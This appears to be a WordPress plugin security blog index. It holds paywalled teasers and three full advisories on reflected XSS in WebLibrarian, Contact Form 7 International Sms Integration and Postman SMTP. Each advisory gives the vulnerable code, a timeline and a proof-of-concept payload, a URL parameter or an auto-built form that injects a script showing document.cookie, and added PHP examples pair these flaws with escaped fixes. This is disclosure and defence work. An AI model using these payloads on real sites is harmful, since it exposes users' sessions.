26 Jul

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Simple Custom CSS and JS

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on it. In those cases we put out a post detailing the vulnerability so that we can provide our customers with more complete information on it.

An advisory released by the JPCERT/CC and IPA states that a reflected cross-site scripting (XSS) vulnerability had been fixed in version ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reasons that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

26 Jul

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Popup Maker

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on it. In those cases we put out a post detailing the vulnerability so that we can provide our customers with more complete information on it.

An advisory released by the JPCERT/CC and IPA states that a cross-site scripting (XSS) vulnerability had been fixed in version 1.6.5 ...



25 Jul

Reflected Cross-Site Scripting (XSS) Vulnerability in WebLibrarian

Recently a change was made to the plugin WebLibrarian that was supposed to “Fix XSS problem in front end short codes.” After not finding any report on this issue, we started looking over things to see if there was in fact a vulnerability, so that we could prepare a post on it for our customers.

Before we were able to figure out how that issue could be exploited, we found that a related vulnerability existed in the new version.

When a page or post with the shortcode “weblib_itemlist” is visited, the function item_list() is run, which is located in /includes/short_codes.php. Several lines in, the following code runs:

$result = "\n<!-- barcodetable: _REQUEST is ".print_r($_REQUEST,true)." -->\n";

That code outputs any GET or POST inputs without escaping them, which could be exploited for reflected cross-site scripting (XSS).

After we notified the developer of the issue, they resolved it the next day by commenting out the line (it was debug code).

Proof of Concept

The following proof of concept will cause any available cookies to be shown in an alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Visit a post or page that has the “weblib_itemlist” shortcode, add the following URL parameter to the URL, and then visit the resulting URL (add a “?” before it if there are not already any URL parameters):

xss=--><script>alert(document.cookie);</script>

Timeline

  • July 24, 2017 – Developer notified.
  • July 25, 2017 – Version 3.4.8.7 released, which fixes vulnerability.
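The debug line above, reproduced as an added example (not WebLibrarian's code) next to an escaped version and a check that detects the comment breakout; it assumes a stand-in for WordPress's esc_html() so it runs outside WordPress, and uses a constructed request value.

```php
<?php
// Added example (not WebLibrarian's code): the debug line described above, which
// dumped $_REQUEST into an HTML comment, next to an escaped version and a check.

// Constructed request: the "xss" parameter carries the comment terminator.
$request = ['xss' => '--><i>injected</i>'];

// Stand-in for WordPress's esc_html() so this runs outside WordPress (assumption).
function esc_html_standin(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern: print_r() output goes straight into the comment, so any
// "-->" in a request value ends the comment and the rest is parsed as markup.
function barcodetable_debug_vulnerable(array $request): string
{
    return "\n<!-- barcodetable: _REQUEST is " . print_r($request, true) . " -->\n";
}

// Escaped variant: "-->" becomes "--&gt;" and cannot close the comment. Removing
// the debug line altogether, as the developer did, is the better fix.
function barcodetable_debug_escaped(array $request): string
{
    return "\n<!-- barcodetable: _REQUEST is "
        . esc_html_standin(print_r($request, true)) . " -->\n";
}

// Check: the comment must close exactly once, at the intended trailing " -->".
// A second occurrence means request data terminated it early.
function comment_breaks_out(string $html): bool
{
    return substr_count($html, '-->') > 1;
}

foreach (['vulnerable' => barcodetable_debug_vulnerable($request),
          'escaped'    => barcodetable_debug_escaped($request)] as $label => $html) {
    echo $label . ': ' . (comment_breaks_out($html) ? 'comment terminated early' : 'ok') . "\n";
}
```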

19 Jul

Reflected Cross-Site Scripting (XSS) Vulnerability in Contact Form 7 International Sms Integration

Last month we were trying to get an idea of how effective it would be to try to proactively catch some vulnerabilities when changes are made to WordPress plugins that include those vulnerabilities. In doing one of the preliminary checks we came across a reflected cross-site scripting (XSS) vulnerability that exists in the plugin Contact Form 7 International Sms Integration.

On line 366 of the file /includes/admin/class-sms-log-display.php the value of GET or POST input “page” is output without being escaped:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />

While the GET input “page” needs to be set to “cf7-international-sms-integration-settings” for that code to run, the POST input can be set to another value, and depending on the configuration of PHP the POST value can be the one that $_REQUEST returns and therefore the one that is output.

We notified the developer of the issue a month ago. They promptly responded that they would fix it “asap”, but so far the plugin has not been updated.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in an alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=cf7-international-sms-integration-settings&tab=smslogs" method="POST">
<input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • June 19, 2017 – Developer notified.
  • June 19, 2017 – Developer responded.

10 Jul

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in WP Live Chat Support

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on it. In those cases we put out a post detailing the vulnerability so that we can provide our customers with more complete information on it.

An advisory released by the JPCERT/CC and IPA states that a cross-site scripting (XSS) vulnerability had been fixed in ...



06 Jul

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Responsive Lightbox

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on it. In those cases we put out a post detailing the vulnerability so that we can provide our customers with more complete information on it.

An advisory released by the JPCERT/CC and IPA states that a cross-site scripting (XSS) vulnerability had been fixed in version 1.7.2 ...



30 Jun

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Event Calendar WD

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on it. In those cases we put out a post detailing the vulnerability so that we can provide our customers with more complete information on it.

An advisory released by the JPCERT/CC and IPA states that a cross-site scripting (XSS) vulnerability had been fixed in ...



29 Jun

Reflected Cross-Site Scripting (XSS) Vulnerability in Postman SMTP

We recently found that the plugin Postman SMTP contains a reflected cross-site scripting (XSS) vulnerability.

On line 346 of the file /Postman/Postman-Email-Log/PostmanEmailLogController.php the value of GET or POST input “page” is output without being escaped:

value="<?php echo $_REQUEST['page'] ?>" />

While the GET input “page” needs to be set to “postman_email_log” for that code to run, the POST input can be set to another value, and depending on the configuration of PHP the POST value can be the one that $_REQUEST returns and therefore the one that is output.

The website of the developer is down and we couldn’t find any other method to contact them directly. The plugin was last updated 16 months ago and is only listed as being compatible up to WordPress 4.4, so it doesn’t look like it is being maintained at this time.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in an alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=postman_email_log" method="POST">
<input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>
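The GET-versus-POST precedence described in this post and in the Contact Form 7 International Sms Integration post above, as an added example that is not code from either plugin: it models how $_REQUEST is assembled (assuming PHP's request_order is "GP", the php.ini-production default, where POST overrides GET), uses a stand-in for WordPress's esc_attr(), and shows the unescaped attribute beside a hardened version that reads the routing parameter from $_GET and escapes it.

```php
<?php
// Added example (not code from either plugin): why a POST "page" value can be
// echoed even though routing checked the GET "page" value, and how to fix it.

// Constructed request: the query string carries the correct routing value while
// the POST body carries a different "page" value, as the PoC form above does.
$get  = ['page' => 'postman_email_log'];
$post = ['page' => '"><b>injected</b>'];

// Simplified model of PHP's request_order (assumption: "GP", the
// php.ini-production default; later sources override earlier ones).
function build_request(array $get, array $post, string $order = 'GP'): array
{
    $request = [];
    foreach (str_split($order) as $source) {
        if ($source === 'G') { $request = array_merge($request, $get); }
        if ($source === 'P') { $request = array_merge($request, $post); }
    }
    return $request;
}

// Stand-in for WordPress's esc_attr() so this runs outside WordPress (assumption).
function esc_attr_standin(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern from the post: the $_REQUEST value echoed into an attribute.
function hidden_input_vulnerable(array $request): string
{
    return '<input type="hidden" name="page" value="' . $request['page'] . '" />';
}

// Hardened: read the value from the same source the routing check used ($_GET)
// and escape it for the attribute context.
function hidden_input_hardened(array $get): string
{
    return '<input type="hidden" name="page" value="' . esc_attr_standin($get['page']) . '" />';
}

// Check: the snippet should contain exactly one tag; a second "<" means the
// value closed the attribute and started new markup.
function attribute_breaks_out(string $html): bool
{
    return substr_count($html, '<') > 1;
}

$request = build_request($get, $post);
echo 'Value $_REQUEST["page"] resolves to: ' . $request['page'] . "\n";
echo 'vulnerable: ' . (attribute_breaks_out(hidden_input_vulnerable($request)) ? 'attribute breakout' : 'ok') . "\n";
echo 'hardened:   ' . (attribute_breaks_out(hidden_input_hardened($get)) ? 'attribute breakout' : 'ok') . "\n";
```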

23 Jun

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Analytics Tracker

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on it. In those cases we put out a post detailing the vulnerability so that we can provide our customers with more complete information on it.

The changelog entry for version 1.1.1 of the plugin Analytics Tracker is “Fixed XSS vulnerability on search event, thanks to Arjan ...

